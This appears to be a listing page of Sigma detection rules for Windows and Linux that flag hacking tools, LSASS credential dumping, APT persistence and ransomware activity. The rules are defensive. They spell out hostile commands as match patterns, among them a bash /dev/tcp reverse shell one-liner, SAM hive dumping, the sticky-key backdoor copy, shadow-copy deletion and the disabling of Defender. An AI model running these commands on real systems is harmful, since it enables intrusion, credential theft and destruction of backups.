title: HackTool - Dumpert Process Dumper Default File
id: 93d94efc-d7ad-4161-ad7d-1638c4f908d8
related:
- id: 2704ab9e-afe2-4854-a3b1-0c0706d03578
type: derived
status: test
description: Detects the creation of the default dump file used by Outflank Dumpert tool. A process dumper, which dumps the lsass process memory
references:
- https://github.com/outflanknl/Dumpert
- https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/
author: Florian Roth (Nextron Systems)
date: 2020-02-04
modified: 2023-05-09
tags:
- attack.credential-access
- attack.t1003.001
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|endswith: 'dumpert.dmp'
condition: selection
falsepositives:
- Very unlikely
level: critical
critical
Moderate
High FP
HackTool - Empire PowerShell UAC Bypass
Detects some Empire PowerShell UAC bypass methods
title: HackTool - Empire PowerShell UAC Bypass
id: 3268b746-88d8-4cd3-bffc-30077d02c787
status: stable
description: Detects some Empire PowerShell UAC bypass methods
references:
- https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64
- https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64
author: Ecco
date: 2019-08-30
modified: 2023-02-21
tags:
- attack.privilege-escalation
- attack.t1548.002
- car.2019-04-001
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains:
- ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update)'
- ' -NoP -NonI -c $x=$((gp HKCU:Software\Microsoft\Windows Update).Update);'
condition: selection
falsepositives:
- Unknown
level: critical
critical
Moderate
High FP
HackTool - F-Secure C3 Load by Rundll32
F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
title: HackTool - F-Secure C3 Load by Rundll32
id: b18c9d4c-fac9-4708-bd06-dd5bfacf200f
status: test
description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
references:
- https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12
author: Alfie Champion (ajpc500)
date: 2021-06-02
modified: 2023-03-05
tags:
- attack.stealth
- attack.t1218.011
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- 'rundll32.exe'
- '.dll'
- 'StartNodeRelay'
condition: selection
falsepositives:
- Unknown
level: critical
critical
Moderate
High FP
HackTool - Inveigh Execution Artefacts
Detects the presence and execution of Inveigh via dropped artefacts
title: HackTool - Inveigh Execution Artefacts
id: bb09dd3e-2b78-4819-8e35-a7c1b874e449
status: test
description: Detects the presence and execution of Inveigh via dropped artefacts
references:
- https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Output.cs
- https://github.com/Kevin-Robertson/Inveigh/blob/29d9e3c3a625b3033cdaf4683efaafadcecb9007/Inveigh/Support/Control.cs
- https://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-10-24
modified: 2024-06-27
tags:
- attack.command-and-control
- attack.t1219.002
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename|endswith:
- '\Inveigh-Log.txt'
- '\Inveigh-Cleartext.txt'
- '\Inveigh-NTLMv1Users.txt'
- '\Inveigh-NTLMv2Users.txt'
- '\Inveigh-NTLMv1.txt'
- '\Inveigh-NTLMv2.txt'
- '\Inveigh-FormInput.txt'
- '\Inveigh.dll'
- '\Inveigh.exe'
- '\Inveigh.ps1'
- '\Inveigh-Relay.ps1'
condition: selection
falsepositives:
- Unlikely
level: critical
critical
Moderate
High FP
HackTool - Mimikatz Kirbi File Creation
Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
title: HackTool - Mimikatz Kirbi File Creation
id: 9e099d99-44c2-42b6-a6d8-54c3545cab29
related:
- id: 034affe8-6170-11ec-844f-0f78aa0c4d66
type: obsolete
status: test
description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc.
references:
- https://cobalt.io/blog/kerberoast-attack-techniques
- https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
author: Florian Roth (Nextron Systems), David ANDRE
date: 2021-11-08
modified: 2024-06-27
tags:
- attack.credential-access
- attack.t1558
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|endswith:
- '.kirbi' # Kerberos tickets
- 'mimilsa.log' # MemSSP default file
condition: selection
falsepositives:
- Unlikely
level: critical
critical
Moderate
High FP
HackTool - QuarksPwDump Dump File
Detects a dump file written by QuarksPwDump password dumper
title: HackTool - QuarksPwDump Dump File
id: 847def9e-924d-4e90-b7c4-5f581395a2b4
status: test
description: Detects a dump file written by QuarksPwDump password dumper
references:
- https://jpcertcc.github.io/ToolAnalysisResultSheet/details/QuarksPWDump.htm
author: Florian Roth (Nextron Systems)
date: 2018-02-10
modified: 2024-06-27
tags:
- attack.credential-access
- attack.t1003.002
logsource:
category: file_event
product: windows
detection:
selection:
TargetFilename|contains|all:
- '\AppData\Local\Temp\SAM-'
- '.dmp'
condition: selection
falsepositives:
- Unknown
level: critical
critical
Moderate
High FP
HackTool - Sliver C2 Implant Activity Pattern
Detects process activity patterns as seen being used by Sliver C2 framework implants
title: HackTool - Sliver C2 Implant Activity Pattern
id: 42333b2c-b425-441c-b70e-99404a17170f
status: test
description: Detects process activity patterns as seen being used by Sliver C2 framework implants
references:
- https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/implant/sliver/shell/shell_windows.go#L36
- https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/
author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)
date: 2022-08-25
modified: 2023-03-05
tags:
- attack.execution
- attack.t1059
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains: '-NoExit -Command [Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8'
condition: selection
falsepositives:
- Unlikely
level: critical
critical
Strong
High FP
InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
id: 3be82d5d-09fe-4d6a-a275-0d40d234d324
status: test
description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
references:
- https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver
- https://www.zerodayinitiative.com/advisories/ZDI-21-1308/
author: Florian Roth (Nextron Systems)
date: 2021-11-22
modified: 2022-12-25
tags:
- attack.privilege-escalation
- attack.t1068
- detection.emerging-threats
logsource:
category: file_event
product: windows
detection:
selection:
Image|endswith: '\msiexec.exe'
TargetFilename|startswith: 'C:\Program Files (x86)\Microsoft\Edge\Application'
TargetFilename|endswith: '\elevation_service.exe'
condition: selection
falsepositives:
- Unknown
- Possibly some Microsoft Edge upgrades
level: critical
critical
Strong
Medium FP
Lazarus Group Activity
Detects different process execution behaviors as described in various threat reports on Lazarus group activity
title: Lazarus Group Activity
id: 24c4d154-05a4-4b99-b57d-9b977472443a
related:
- id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e
type: obsolete
status: test
description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
references:
- https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
- https://www.hvs-consulting.de/lazarus-report/
author: Florian Roth (Nextron Systems), wagga
date: 2020-12-23
modified: 2023-03-10
tags:
- attack.g0032
- attack.execution
- attack.t1059
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_generic:
CommandLine|contains:
- 'reg.exe save hklm\sam %temp%\~reg_sam.save'
- '1q2w3e4r@#$@#$@#$'
- ' -hp1q2w3e4 '
- '.dat data03 10000 -p '
selection_netstat:
CommandLine|contains|all:
- 'netstat -aon | find '
- 'ESTA'
- ' > %temp%\~'
# Network share discovery
selection_network_discovery:
CommandLine|contains|all:
- '.255 10 C:\ProgramData\IBM\'
- '.DAT'
selection_persistence:
CommandLine|contains|all:
- ' /c '
- ' -p 0x'
CommandLine|contains:
- 'C:\ProgramData\'
- 'C:\RECYCLER\'
selection_rundll32:
CommandLine|contains|all:
- 'rundll32 '
- 'C:\ProgramData\'
CommandLine|contains:
- '.bin,'
- '.tmp,'
- '.dat,'
- '.io,'
- '.ini,'
- '.db,'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
critical
Moderate
High FP
Leviathan Registry Key Activity
Detects registry key used by Leviathan APT in Malaysian focused campaign
title: Leviathan Registry Key Activity
id: 70d43542-cd2d-483c-8f30-f16b436fd7db
status: test
description: Detects registry key used by Leviathan APT in Malaysian focused campaign
references:
- https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign
author: Aidan Bracher
date: 2020-07-07
modified: 2023-09-19
tags:
- attack.privilege-escalation
- attack.persistence
- attack.t1547.001
- detection.emerging-threats
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|contains: '\Software\Microsoft\Windows\CurrentVersion\Run\ntkd'
condition: selection
level: critical
critical
Moderate
Medium FP
Linux Reverse Shell Indicator
Detects a bash connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
title: Linux Reverse Shell Indicator
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
status: test
description: Detects a bash connecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
references:
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
author: Florian Roth (Nextron Systems)
date: 2021-10-16
modified: 2022-12-25
tags:
- attack.execution
- attack.t1059.004
logsource:
product: linux
category: network_connection
detection:
selection:
Image|endswith: '/bin/bash'
filter:
DestinationIp:
- '127.0.0.1'
- '0.0.0.0'
condition: selection and not filter
falsepositives:
- Unknown
level: critical
critical
Strong
High FP
LockerGoga Ransomware Activity
Detects LockerGoga ransomware activity via specific command line.
title: LockerGoga Ransomware Activity
id: 74db3488-fd28-480a-95aa-b7af626de068
status: stable
description: Detects LockerGoga ransomware activity via specific command line.
references:
- https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a
- https://blog.f-secure.com/analysis-of-lockergoga-ransomware/
- https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/
author: Vasiliy Burov, oscd.community
date: 2020-10-18
modified: 2023-02-03
tags:
- attack.impact
- attack.t1486
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains: '-i SM-tgytutrc -s'
condition: selection
falsepositives:
- Unlikely
level: critical
critical
Strong
Medium FP
Mint Sandstorm - AsperaFaspex Suspicious Process Execution
Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution
id: 91048c0d-5b81-4b85-a099-c9ee4fb87979
status: test
description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
references:
- https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
date: 2023-04-20
modified: 2025-10-19
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_parent:
ParentImage|contains|all:
- 'aspera'
- '\ruby'
selection_special_child_powershell_img:
Image|endswith:
- '\powershell.exe'
- '\powershell_ise.exe'
selection_special_child_powershell_cli:
- CommandLine|contains:
- ' echo '
- '-dumpmode'
- '-ssh'
- '.dmp'
- 'add-MpPreference'
- 'adscredentials'
- 'bitsadmin'
- 'certutil'
- 'csvhost.exe'
- 'DownloadFile'
- 'DownloadString'
- 'dsquery'
- 'ekern.exe'
- 'FromBase64String'
- 'iex '
- 'iex('
- 'Invoke-Expression'
- 'Invoke-WebRequest'
- 'localgroup administrators'
- 'o365accountconfiguration'
- 'samaccountname='
- 'set-MpPreference'
- 'svhost.exe'
- 'System.IO.Compression'
- 'System.IO.MemoryStream'
- 'usoprivate'
- 'usoshared'
- 'whoami'
- CommandLine|re:
- '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'
- 'net\s+user'
- 'net\s+group'
- 'query\s+session'
selection_special_child_lsass_1:
CommandLine|contains: 'lsass'
selection_special_child_lsass_2:
CommandLine|contains:
- 'procdump'
- 'tasklist'
- 'findstr'
selection_child_wget:
Image|endswith: '\wget.exe'
CommandLine|contains: 'http'
selection_child_curl:
Image|endswith: '\curl.exe'
CommandLine|contains: 'http'
selection_child_script:
CommandLine|contains:
- 'E:jscript'
- 'e:vbscript'
selection_child_localgroup:
CommandLine|contains|all:
- 'localgroup Administrators'
- '/add'
selection_child_net:
CommandLine|contains: 'net' # Covers net1
CommandLine|contains|all:
- 'user'
- '/add'
selection_child_reg:
- CommandLine|contains|all:
- 'reg add'
- 'DisableAntiSpyware'
- '\Microsoft\Windows Defender'
- CommandLine|contains|all:
- 'reg add'
- 'DisableRestrictedAdmin'
- 'CurrentControlSet\Control\Lsa'
selection_child_wmic_1:
CommandLine|contains|all:
- 'wmic'
- 'process call create'
selection_child_wmic_2:
CommandLine|contains|all:
- 'wmic'
- 'delete'
- 'shadowcopy'
selection_child_vssadmin:
CommandLine|contains|all:
- 'vssadmin'
- 'delete'
- 'shadows'
selection_child_wbadmin:
CommandLine|contains|all:
- 'wbadmin'
- 'delete'
- 'catalog'
condition: selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)
falsepositives:
- Unlikely
level: critical
critical
Strong
Medium FP
Mint Sandstorm - ManageEngine Suspicious Process Execution
Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
title: Mint Sandstorm - ManageEngine Suspicious Process Execution
id: 58d8341a-5849-44cd-8ac8-8b020413a31b
status: test
description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
references:
- https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
date: 2023-04-20
modified: 2025-10-19
tags:
- attack.execution
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_parent_path:
ParentImage|contains:
- 'manageengine'
- 'ServiceDesk'
selection_parent_image:
ParentImage|contains: '\java'
selection_special_child_powershell_img:
Image|endswith:
- '\powershell.exe'
- '\powershell_ise.exe'
selection_special_child_powershell_cli:
- CommandLine|contains:
- ' echo '
- '-dumpmode'
- '-ssh'
- '.dmp'
- 'add-MpPreference'
- 'adscredentials'
- 'bitsadmin'
- 'certutil'
- 'csvhost.exe'
- 'DownloadFile'
- 'DownloadString'
- 'dsquery'
- 'ekern.exe'
- 'FromBase64String'
- 'iex '
- 'iex('
- 'Invoke-Expression'
- 'Invoke-WebRequest'
- 'localgroup administrators'
- 'o365accountconfiguration'
- 'samaccountname='
- 'set-MpPreference'
- 'svhost.exe'
- 'System.IO.Compression'
- 'System.IO.MemoryStream'
- 'usoprivate'
- 'usoshared'
- 'whoami'
- CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'
- CommandLine|re: 'net\s+user'
- CommandLine|re: 'net\s+group'
- CommandLine|re: 'query\ssession'
selection_special_child_lsass_1:
CommandLine|contains: 'lsass'
selection_special_child_lsass_2:
CommandLine|contains:
- 'procdump'
- 'tasklist'
- 'findstr'
selection_child_wget:
Image|endswith: '\wget.exe'
CommandLine|contains: 'http'
selection_child_curl:
Image|endswith: '\curl.exe'
CommandLine|contains: 'http'
selection_child_script:
CommandLine|contains:
- 'E:jscript'
- 'e:vbscript'
selection_child_localgroup:
CommandLine|contains|all:
- 'localgroup Administrators'
- '/add'
selection_child_net:
CommandLine|contains: 'net' # Covers net1
CommandLine|contains|all:
- 'user'
- '/add'
selection_child_reg:
- CommandLine|contains|all:
- 'reg add'
- 'DisableAntiSpyware'
- '\Microsoft\Windows Defender'
- CommandLine|contains|all:
- 'reg add'
- 'DisableRestrictedAdmin'
- 'CurrentControlSet\Control\Lsa'
selection_child_wmic_1:
CommandLine|contains|all:
- 'wmic'
- 'process call create'
selection_child_wmic_2:
CommandLine|contains|all:
- 'wmic'
- 'delete'
- 'shadowcopy'
selection_child_vssadmin:
CommandLine|contains|all:
- 'vssadmin'
- 'delete'
- 'shadows'
selection_child_wbadmin:
CommandLine|contains|all:
- 'wbadmin'
- 'delete'
- 'catalog'
filter_main:
CommandLine|contains|all:
- 'download.microsoft.com'
- 'manageengine.com'
- 'msiexec'
condition: all of selection_parent_* and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*) and not filter_main
falsepositives:
- Unlikely
level: critical
critical
Moderate
Medium FP
Moriya Rootkit File Created
Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in Securelist's Operation TunnelSnake report.
title: Moriya Rootkit File Created
id: a1507d71-0b60-44f6-b17c-bf53220fdd88
related:
- id: 25b9c01c-350d-4b95-bed1-836d04a4f324
type: derived
status: test
description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in Securelist's Operation TunnelSnake report.
references:
- https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
author: Bhabesh Raj
date: 2021-05-06
modified: 2023-05-05
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1543.003
- detection.emerging-threats
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename: 'C:\Windows\System32\drivers\MoriyaStreamWatchmen.sys'
condition: selection
falsepositives:
- Unknown
level: critical
critical
Strong
Medium FP
OceanLotus Registry Activity
Detects registry keys created in OceanLotus (also known as APT32) attacks
title: OceanLotus Registry Activity
id: 4ac5fc44-a601-4c06-955b-309df8c4e9d4
status: test
description: Detects registry keys created in OceanLotus (also known as APT32) attacks
references:
- https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/
- https://github.com/eset/malware-ioc/tree/master/oceanlotus
author: megan201296, Jonhnathan Ribeiro
date: 2019-04-14
modified: 2023-09-28
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
- detection.emerging-threats
logsource:
category: registry_event
product: windows
detection:
selection_clsid:
TargetObject|contains: '\SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model'
selection_hkcu:
TargetObject|contains:
# HKCU\SOFTWARE\Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\
- 'Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\'
# HKCU\SOFTWARE\Classes\AppX3bbba44c6cae4d9695755183472171e2\
- 'Classes\AppX3bbba44c6cae4d9695755183472171e2\'
# HKCU\SOFTWARE\Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\
- 'Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\'
- 'Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model'
selection_appx_1:
TargetObject|contains: '\SOFTWARE\App\'
selection_appx_2:
TargetObject|contains:
- 'AppXbf13d4ea2945444d8b13e2121cb6b663\'
- 'AppX70162486c7554f7f80f481985d67586d\'
- 'AppX37cc7fdccd644b4f85f4b22d5a3f105a\'
TargetObject|endswith:
- 'Application'
- 'DefaultIcon'
condition: selection_clsid or selection_hkcu or all of selection_appx_*
falsepositives:
- Unknown
level: critical
critical
Strong
Medium FP
OilRig APT Activity
Detects OilRig activity as reported by Nyotron in their March 2018 report
title: OilRig APT Activity
id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06
related:
- id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System
type: similar
- id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security
type: similar
- id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5 # Registry
type: similar
status: test
description: Detects OilRig activity as reported by Nyotron in their March 2018 report
references:
- https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
date: 2018-03-23
modified: 2023-03-08
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.defense-impairment
- attack.g0049
- attack.t1053.005
- attack.s0111
- attack.t1543.003
- attack.t1112
- attack.command-and-control
- attack.t1071.004
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_schtasks:
CommandLine|contains|all:
- 'SC Scheduled Scan'
- '\microsoft\Taskbar\autoit3.exe'
selection_temp:
Image|contains: '\Windows\Temp\DB\'
Image|endswith: '.exe'
selection_service:
Image: 'C:\Windows\system32\Service.exe'
CommandLine|contains:
- 'i'
- 'u'
selection_autoit:
ParentImage|endswith: '\local\microsoft\Taskbar\autoit3.exe'
CommandLine|contains|all:
- 'nslookup.exe'
- '-q=TXT'
condition: 1 of selection_*
falsepositives:
- Unlikely
level: critical
critical
Moderate
High FP
OilRig APT Registry Persistence
Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
title: OilRig APT Registry Persistence
id: 7bdf2a7c-3acc-4091-9581-0a77dad1c5b5
related:
- id: 53ba33fd-3a50-4468-a5ef-c583635cfa92 # System
type: similar
- id: c0580559-a6bd-4ef6-b9b7-83703d98b561 # Security
type: similar
- id: ce6e34ca-966d-41c9-8d93-5b06c8b97a06 # ProcessCreation
type: similar
status: test
description: Detects OilRig registry persistence as reported by Nyotron in their March 2018 report
references:
- https://web.archive.org/web/20180402134442/https://nyotron.com/wp-content/uploads/2018/03/Nyotron-OilRig-Malware-Report-March-2018C.pdf
author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community
date: 2018-03-23
modified: 2023-03-08
tags:
- attack.privilege-escalation
- attack.execution
- attack.persistence
- attack.defense-impairment
- attack.g0049
- attack.t1053.005
- attack.s0111
- attack.t1543.003
- attack.t1112
- attack.command-and-control
- attack.t1071.004
- detection.emerging-threats
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|endswith:
- 'SOFTWARE\Microsoft\Windows\CurrentVersion\UMe'
- 'SOFTWARE\Microsoft\Windows\CurrentVersion\UT'
condition: selection
falsepositives:
- Unlikely
level: critical
critical
Moderate
High FP
Pandemic Registry Key
Detects Pandemic Windows Implant
title: Pandemic Registry Key
id: 47e0852a-cf81-4494-a8e6-31864f8c86ed
status: test
description: Detects Pandemic Windows Implant
references:
- https://wikileaks.org/vault7/#Pandemic
- https://twitter.com/MalwareJake/status/870349480356454401
author: Florian Roth (Nextron Systems)
date: 2017-06-01
modified: 2022-10-09
tags:
- attack.command-and-control
- attack.t1105
- detection.emerging-threats
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|contains: '\SYSTEM\CurrentControlSet\services\null\Instance'
condition: selection
falsepositives:
- Unknown
level: critical
critical
Moderate
High FP
Persistence Via Sticky Key Backdoor
By replacing the sticky keys executable with the local admin's CMD executable, an attacker is able to access a privileged Windows console session without authenticating to the system.
When the sticky keys are "activated" the privileged shell is launched.
title: Persistence Via Sticky Key Backdoor
id: 1070db9a-3e5d-412e-8e7b-7183b616e1b3
status: test
description: |
By replacing the sticky keys executable with the local admin's CMD executable, an attacker is able to access a privileged Windows console session without authenticating to the system.
When the sticky keys are "activated" the privileged shell is launched.
references:
- https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html
- https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf
- https://learn.microsoft.com/en-us/archive/blogs/jonathantrull/detecting-sticky-key-backdoors
author: Sreeman
date: 2020-02-18
modified: 2023-03-07
tags:
- attack.persistence
- attack.t1546.008
- attack.privilege-escalation
logsource:
product: windows
category: process_creation
detection:
selection:
CommandLine|contains|all:
- 'copy '
- '/y '
- 'C:\windows\system32\cmd.exe C:\windows\system32\sethc.exe'
condition: selection
falsepositives:
- Unlikely
level: critical
critical
Moderate
High FP
Potential Conti Ransomware Activity
Detects a specific command used by the Conti ransomware group
title: Potential Conti Ransomware Activity
id: 689308fc-cfba-4f72-9897-796c1dc61487
status: test
description: Detects a specific command used by the Conti ransomware group
references:
- https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/
- https://twitter.com/VK_Intel/status/1447795359900704769?t=Xz7vaLTvaaCZ5kHoZa6gMw&s=19
author: frack113
date: 2021-10-12
modified: 2023-02-13
tags:
- attack.impact
- attack.s0575
- attack.t1486
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection:
CommandLine|contains|all:
- '-m '
- '-net '
- '-size ' # Size 10 in references
- '-nomutex '
- '-p \\\\'
- '$'
condition: selection
falsepositives:
- Unlikely
level: critical
critical
Moderate
Medium FP
Potential Credential Dumping Via LSASS Process Clone
Detects a suspicious LSASS process clone that could be a sign of credential dumping activity
title: Potential Credential Dumping Via LSASS Process Clone
id: c8da0dfd-4ed0-4b68-962d-13c9c884384e
status: test
description: Detects a suspicious LSASS process clone that could be a sign of credential dumping activity
references:
- https://www.matteomalvica.com/blog/2019/12/02/win-defender-atp-cred-bypass/
- https://twitter.com/Hexacorn/status/1420053502554951689
- https://twitter.com/SBousseaden/status/1464566846594691073?s=20
author: Florian Roth (Nextron Systems), Samir Bousseaden
date: 2021-11-27
modified: 2023-03-02
tags:
- attack.credential-access
- attack.t1003
- attack.t1003.001
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\Windows\System32\lsass.exe'
Image|endswith: '\Windows\System32\lsass.exe'
condition: selection
falsepositives:
- Unknown
level: critical
critical
Moderate
High FP
Potential Credential Dumping Via LSASS SilentProcessExit Technique
Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
title: Potential Credential Dumping Via LSASS SilentProcessExit Technique
id: 55e29995-75e7-451a-bef0-6225e2f13597
related:
- id: 36803969-5421-41ec-b92f-8500f79c23b0
type: similar
status: test
description: Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process
references:
- https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/
- https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/
author: Florian Roth (Nextron Systems)
date: 2021-02-26
modified: 2022-12-19
tags:
- attack.credential-access
- attack.t1003.001
logsource:
category: registry_event
product: windows
detection:
selection:
TargetObject|contains: 'Microsoft\Windows NT\CurrentVersion\SilentProcessExit\lsass.exe'
condition: selection
falsepositives:
- Unlikely
level: critical
critical
Moderate
Medium FP
Potential DCOM InternetExplorer.Application DLL Hijack
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
title: Potential DCOM InternetExplorer.Application DLL Hijack
id: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa
related:
- id: e554f142-5cf3-4e55-ace9-a1b59e0def65
type: obsolete
- id: f354eba5-623b-450f-b073-0b5b2773b6aa
type: similar
status: test
description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class over the network
references:
- https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
date: 2020-10-12
modified: 2022-12-18
tags:
- attack.lateral-movement
- attack.t1021.002
- attack.t1021.003
logsource:
product: windows
category: file_event
detection:
selection:
Image: System
TargetFilename|endswith: '\Internet Explorer\iertutil.dll'
condition: selection
falsepositives:
- Unknown
level: critical
critical
Moderate
Medium FP
Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
title: Potential DCOM InternetExplorer.Application DLL Hijack - Image Load
id: f354eba5-623b-450f-b073-0b5b2773b6aa
related:
- id: e554f142-5cf3-4e55-ace9-a1b59e0def65
type: obsolete
- id: 2f7979ae-f82b-45af-ac1d-2b10e93b0baa
type: similar
status: test
description: Detects potential DLL hijack of "iertutil.dll" found in the DCOM InternetExplorer.Application Class
references:
- https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga
date: 2020-10-12
modified: 2022-12-18
tags:
- attack.lateral-movement
- attack.t1021.002
- attack.t1021.003
logsource:
product: windows
category: image_load
detection:
selection:
Image|endswith: '\Internet Explorer\iexplore.exe'
ImageLoaded|endswith: '\Internet Explorer\iertutil.dll'
condition: selection
falsepositives:
- Unknown
level: critical
Showing 1-50 of 1,524